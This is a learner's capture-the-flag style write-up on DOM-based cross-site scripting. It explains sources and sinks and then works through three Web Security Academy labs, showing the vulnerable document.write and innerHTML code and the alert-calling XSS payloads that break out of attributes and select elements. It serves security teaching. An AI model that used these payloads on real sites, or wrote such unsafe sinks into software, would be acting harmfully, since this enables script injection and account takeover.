DOM-XSS
DOM-based cross-site scripting​
DOM-based XSS (also known as DOM XSS) arises when an application contains some client-side JavaScript that processes data from an untrusted source in an unsafe way, usually by writing the data back to the DOM.
In the following example, an application uses some JavaScript to read the value from an input field and write that value to an element within the HTML:
var search = document.getElementById('search').value;
var results = document.getElementById('results');
results.innerHTML = 'You searched for: ' + search;
If the attacker can control the value of the input field, they can easily construct a malicious value that causes their own script to execute:
You searched for: <img src=1 onerror='/* Bad stuff here... */'>
In a typical case, the input field would be populated from part of the HTTP request, such as a URL query string parameter, allowing the attacker to deliver an attack using a malicious URL, in the same manner as reflected XSS.
What is DOM-based cross-site scripting?​
DOM-based XSS vulnerabilities usually arise when JavaScript takes data from an attacker-controllable source, such as the URL, and passes it to a sink that supports dynamic code execution, such as eval() or innerHTML. This enables attackers to execute malicious JavaScript, which typically allows them to hijack other users' accounts.
To deliver a DOM-based XSS attack, you need to place data into a source so that it is propagated to a sink and causes execution of arbitrary JavaScript.
The most common source for DOM XSS is the URL, which is typically accessed with the window.location object. An attacker can construct a link to send a victim to a vulnerable page with a payload in the query string and fragment portions of the URL. In certain circumstances, such as when targeting a 404 page or a website running PHP, the payload can also be placed in the path.
For a detailed explanation of the taint flow between sources and sinks, please refer to the DOM-based vulnerabilities page.
How to test for DOM-based cross-site scripting​
The majority of DOM XSS vulnerabilities can be found quickly and reliably using Burp Suite's web vulnerability scanner. To test for DOM-based cross-site scripting manually, you generally need to use a browser with developer tools, such as Chrome. You need to work through each available source in turn, and test each one individually.
Testing HTML sinks​
To test for DOM XSS in an HTML sink, place a random alphanumeric string into the source (such as location.search), then use developer tools to inspect the HTML and find where your string appears. Note that the browser's "View source" option won't work for DOM XSS testing because it doesn't take account of changes that have been performed in the HTML by JavaScript. In Chrome's developer tools, you can use Control+F (or Command+F on MacOS) to search the DOM for your string.
For each location where your string appears within the DOM, you need to identify the context. Based on this context, you need to refine your input to see how it is processed. For example, if your string appears within a double-quoted attribute then try to inject double quotes in your string to see if you can break out of the attribute.
Note that browsers behave differently with regards to URL-encoding, Chrome, Firefox, and Safari will URL-encode location.search and location.hash, while IE11 and Microsoft Edge (pre-Chromium) will not URL-encode these sources. If your data gets URL-encoded before being processed, then an XSS attack is unlikely to work.
Testing JavaScript execution sinks​
Testing JavaScript execution sinks for DOM-based XSS is a little harder. With these sinks, your input doesn't necessarily appear anywhere within the DOM, so you can't search for it. Instead you'll need to use the JavaScript debugger to determine whether and how your input is sent to a sink.
For each potential source, such as location, you first need to find cases within the page's JavaScript code where the source is being referenced. In Chrome's developer tools, you can use Control+Shift+F (or Command+Alt+F on MacOS) to search all the page's JavaScript code for the source.
Once you've found where the source is being read, you can use the JavaScript debugger to add a break point and follow how the source's value is used. You might find that the source gets assigned to other variables. If this is the case, you'll need to use the search function again to track these variables and see if they're passed to a sink. When you find a sink that is being assigned data that originated from the source, you can use the debugger to inspect the value by hovering over the variable to show its value before it is sent to the sink. Then, as with HTML sinks, you need to refine your input to see if you can deliver a successful XSS attack.
Lab: DOM XSS in document.write sink using source location.search​
This lab contains a DOM-based cross-site scripting vulnerability in the search query tracking functionality. It uses the JavaScript
document.writefunction, which writes data out to the page. Thedocument.writefunction is called with data fromlocation.search, which you can control using the website URL. To solve this lab, perform a cross-site scripting attack that calls thealertfunction.
--> So i just searched for test and intercepted the request and found this js code at the bottom of source code.
<script>
function trackSearch(query) {
document.write(
'<img src="/resources/images/tracker.gif?searchTerms=' + query + '">'
);
}
var query = new URLSearchParams(window.location.search).get("search");
if (query) {
trackSearch(query);
}
</script>
--> So here our query is wrapper between double quotes so first we have to close that and also after that we have to close the angular bracket also. So our final payload will look like this:
">
<script>
alert(1);
</script>
And we solved the lab!
Lab: DOM XSS in document.write sink using source location.search inside a select element​
This lab contains a DOM-based cross-site scripting vulnerability in the stock checker functionality. It uses the JavaScript
document.writefunction, which writes data out to the page. Thedocument.writefunction is called with data fromlocation.searchwhich you can control using the website URL. The data is enclosed within a select element. To solve this lab, perform a cross-site scripting attack that breaks out of the select element and calls thealertfunction.
--> I found this js code in check stock functionality from inspect element.
var stores = ["London", "Paris", "Milan"];
var store = new URLSearchParams(window.location.search).get("storeId");
document.write('<select name="storeId">');
if (store) {
document.write("<option selected>" + store + "</option>");
}
for (var i = 0; i < stores.length; i++) {
if (stores[i] === store) {
continue;
}
document.write("<option>" + stores[i] + "</option>");
}
document.write("</select>");
--> Here the website is taking the storeId from user and writing it in the document. After that it's running a loop which will find that storeId in stores array.
But we can trigger alert in first write method which is
document.write('<select name="storeId">');
So here first we have to close the double quote and tag. And also we have to close the select tag to trigger alert.
so final payload will look like this:
"></select><script>alert(1)</script>
It triggered the popup, but it didn't solved the lab! idk why :/
So i tried the image payload which will also trigger alert on error.
"></select><img src=x onerror=alert(1)>
And you have to pass the payload in URL because there is no input given.
Final payload:
productId=1&storeId="></select><img src=x onerror=alert(1)>
Lab: DOM XSS in innerHTML sink using source location.search​
This lab contains a DOM-based cross-site scripting vulnerability in the search blog functionality. It uses an
innerHTMLassignment, which changes the HTML contents of adivelement, using data fromlocation.search. To solve this lab, perform a cross-site scripting attack that calls thealertfunction.
--> I found this js in search functionality
function doSearchQuery(query) {
document.getElementById("searchMessage").innerHTML = query;
}
var query = new URLSearchParams(window.location.search).get("search");
if (query) {
doSearchQuery(query);
}
So here we just have to use normal image payload to trigger alert.
<img src="x" onerror="alert(1)" />